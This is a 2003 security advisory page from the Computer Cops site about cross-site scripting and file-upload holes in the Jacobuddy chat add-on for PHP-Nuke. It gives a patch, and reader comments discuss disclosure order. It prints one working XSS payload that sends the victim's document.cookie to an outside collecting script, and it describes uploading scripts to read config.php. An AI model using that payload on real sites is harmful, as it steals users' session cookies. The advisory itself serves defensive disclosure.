Computer Cops - Sourceforge Jacobuddy Cross Site Scripting (XSS) And Upload Exploit

New User? Need help? Click here to register for free! Registering removes the advertisements.

Computer Cops

	Donations

	If you found this site helpful, please donate to help keep it online Don't want to use PayPal? Try our physical address

	Prime Choice

	· Head Lines · Advisories (All) · Dnld of the Week! · CCSP News Ltrs · Find a Cure! · Ian T's (AR 22) · Marcia's (CO8) · Bill G's (CO11) · Paul's (AR 5) · Robin's (AR 2) · Ian T's Archive · Marcia's Archive · Bill G's Archive · Paul's Archive · Robin's Archive

	Security Central

	· Home · Wireless · Bookmarks · CLSID · Columbia · Community · Downloads · Encyclopedia · Feedback (send) · Forums · Gallery · Giveaways · HijackThis · Journal · Members List · My Downloads · PremChat · Premium · Private Messages · Proxomitron · Quizz · RegChat · Reviews · Google Search · Sections · Software · Statistics · Stories Archive · Submit News · Surveys · Top · Topics · Web Links · Your Account

	CCSP Toolkit

	· Email Virus Scan · UDP Port Scanner · TCP Port Scanner · Trojan TCP Scan · Reveal Your IP · Algorithms · Whois · nmap port scanner · IPs Banned [?]

Survey

How much can you give to keep Computer Cops online?

	$10 up to $25 per year?
	$25 up to $50 per year?
	$10 up to $25 per month?
	$25 up to $50 per month?
	More than $50 per year?
	More than $50 per month?
	One time only?
	Other (please comment)

Results
Polls

Votes: 887
Comments: 19

Translate

phpnuked: Advisories!: Sourceforge Jacobuddy Cross Site Scripting (XSS) And Upload Exploit

PHP-Nuke

Jacobuddy a Javascript Real Time Chat Module is an independent add-on for the open source GNU/GPL content management system PHP-Nuke. Computer Cops has discovered that Jacobuddy version 3.0 is vulnerable to Cross Site Scripting (XSS) and file system manipulation. It is our belief to contact the author prior to a public posting, but in this case we have supplied a fix for both vulnerabilities of this addon.

The following URL is a sample of how Jacobuddy can be seeded with a XSS exploit within the message body:

http://www.laudanski.com/"style="background-image:url(javascript:nurl='http://www.laudanski.com/j.cgi?';nurl=nurl+document.cookie;document.URL=nurl)

The current unpatched version will automatically redirect the receiver's pop-up Jacobuddy message to another site grabbing their cookie information from the attacked site.

The patch for this is applied to the buddy.php file:

In the following function block:

function send($to, $to_userid, $message, $subject) {

Add the following line after the global statement:

$message = htmlspecialchars(strip_tags($message));

The next vulnerability is the infamous dcc file transfer within the buddy.php file.

Any file uploaded into the system can stay on the system. A malicious script can be generated to grab vital file system data like the php-nuke config.php file and turned into a text file for the malicious uploader to access. Computer Cops highly advises that the entire dcc function be removed from the file in addition to the dcc case block and $who_online clause for the dcc link.

Computer Cops will make an attempt to contact the vendor with this information.

Posted on Saturday, 01 March 2003 @ 23:39:55 EST by Paul

	Login

	Nickname Password · New User? · Click here to create a registered account.

	Related Links

	· TrackBack (0) · GPL · GNU Project · PHP HomePage · SourceForge · OpenSource · PHP-Nuke · HotScripts · W3 Consortium · HTML Standard · More about PHP-Nuke · News by Paul Most read story about PHP-Nuke: Brazilian Hackers Defy Nuke Community

	Article Rating

	Average Score: 5 Votes: 1 Please take a second and vote for this article:

	Options

	Printer Friendly Page

"Login" | Login/Create an Account | 5 comments | _SEARCHDIS

Threshold

The comments are owned by the poster. We aren't responsible for their content.

No Comments Allowed for Anonymous, please register

Re: Jacobuddy Cross Site Scripting (XSS) And Upload Exploit (Score: 1)
by Paul on Saturday, 01 March 2003 @ 23:58:46 EST
(User Info | Send a Message | _JOURNAL)

Author has been emailed.

Re: Sourceforge Jacobuddy Cross Site Scripting (XSS) And Upload Exploit (Score: 0)
by Anonymous on Monday, 03 March 2003 @ 03:05:13 EST

I thought this was reposted news but when I saw it was generated from here, your post fix first, tell vender later policy puzzled me. You took the time to write a nice little article, you've got a good patch I assume you developed, all that good work, so I didn't understand why you decided to wait to notify the developer.

Program developers deserve the courtesy of first alert so they can tell or provide a patch to their userbase directly or from their site asap. It's not like you needed to wait for them to get a patch out afterwards since you have a solution here too, that's true enough. But heh, do things in the right order. At the least, developers just don't appreciate not being told first.

I figure this wasn't for simple credit and more visitors, you seem to me to be one of the good guys. I figure you thought it was a just good idea at the time for the users to get it right out. Heh, I like your site, ComputerCops is excellent. I just don't want to see it gain ANY kind of bad rep, not that it'd turn into an early alert cracker resource or anything. Great site. Keep up the good work.

Btw the site looks terrific too. You might check the hrefs in your nav tags though. Some seem to be messed up with double values and wind up at the error page.

Re: Sourceforge Jacobuddy Cross Site Scripting (XSS) And Upload Exploit by Paul on Monday, 03 March 2003 @ 13:41:16 EST

Re: Sourceforge Jacobuddy Cross Site Scripting (XSS) And Upload Exploit (Score: 0)
by Anonymous on Monday, 03 March 2003 @ 06:00:37 EST

I'm , jacobuddy author's. Thanx for your warning and also for your patch.
Jacobuddy is an opensource project and any contribs is welcomed. Now i'll patch the new version with your fix if u agree.
Now i've a request: i'd like to keep centralized the jacobuddy development, so jacobuddy has a CVS on sourceforge, so i'll very happy if someone would help me to develop this project, so we can make a better work and avoid this security bugs.

Tnsx Fory Your courtesy
Fabio

Re: Sourceforge Jacobuddy Cross Site Scripting (XSS) And Upload Exploit by Paul on Monday, 03 March 2003 @ 13:42:37 EST


	Home · Topics · Submit News · Top 10 This entire site, Cops Themes, and Computer Cops are © 2002 - 2004 Computer Cops, LLC. All rights reserved. You can syndicate our news using the file RSS 0.91, ultramode.txt, or RSS 1.0. Acceptable Use Policy. Use signifies your agreement. Engine Copyright © 2002 by PHP-Nuke, GNU/GPL Licensed. ICRA Member. Paul Laudanski, Member of Computer Cops, LLC Server Load: 931 pages served in previous 5 minutes. Page Generation: 0.462 seconds.